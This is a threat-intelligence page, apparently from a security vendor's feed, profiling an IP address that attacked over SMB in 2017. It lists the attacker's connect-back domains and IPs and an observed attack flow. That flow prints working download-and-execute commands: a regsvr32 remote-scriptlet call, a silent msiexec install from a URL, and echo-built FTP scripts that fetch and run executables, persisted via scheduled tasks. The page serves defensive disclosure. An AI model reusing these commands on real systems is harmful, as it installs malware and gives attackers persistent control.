IP Address: 182.18.21.227Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
182.18.21.227​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SMB

Tags

Access Suspicious Domain SMB Scheduled Task Creation Cookie Hijacking Modification SMB Null Session Login DNS Query Outgoing Connection File Operation By CMD Modification Persistency - Logon CMD

Connect Back Servers

wmi.mykings.top down.oo000oo.club down.mysking.info js.oo000oo.club wmi.oo000oo.club js.mykings.top

23.27.127.254 23.27.127.106

Basic Information

IP Address

182.18.21.227

Domain

-

ISP

Beijing yiantianxia Network Science&Technology Co

Country

China

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2017-05-21

Last seen in Guardicore Centra

2017-05-25

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

Process c:\windows\system32\lsass.exe attempted to access suspicious domains: down.oo000oo.club

DNS Query Access Suspicious Domain Outgoing Connection

Process c:\windows\system32\lsass.exe generated outgoing network traffic to: 23.27.127.106:8888

Outgoing Connection

c:\windows\system32\reg.exe set the command line regsvr32 /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll to run using Persistency - Logon

Persistency - Logon

c:\windows\system32\taskkill.exe set the command line msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q to run using Persistency - Logon

Persistency - Logon

The command line cmd /c echo open down.5b6b7b.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa.job

The command line C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa1.job

The command line cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa2.job

Process c:\windows\system32\wbem\scrcons.exe attempted to access suspicious domains: wmi.oo000oo.club

DNS Query Access Suspicious Domain Outgoing Connection

Process c:\windows\system32\wbem\scrcons.exe generated outgoing network traffic to: 23.27.127.106:8888

Outgoing Connection

Process c:\windows\system32\regsvr32.exe attempted to access suspicious domains: js.oo000oo.club

DNS Query Access Suspicious Domain

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 182.18.21.227​Previously Malicious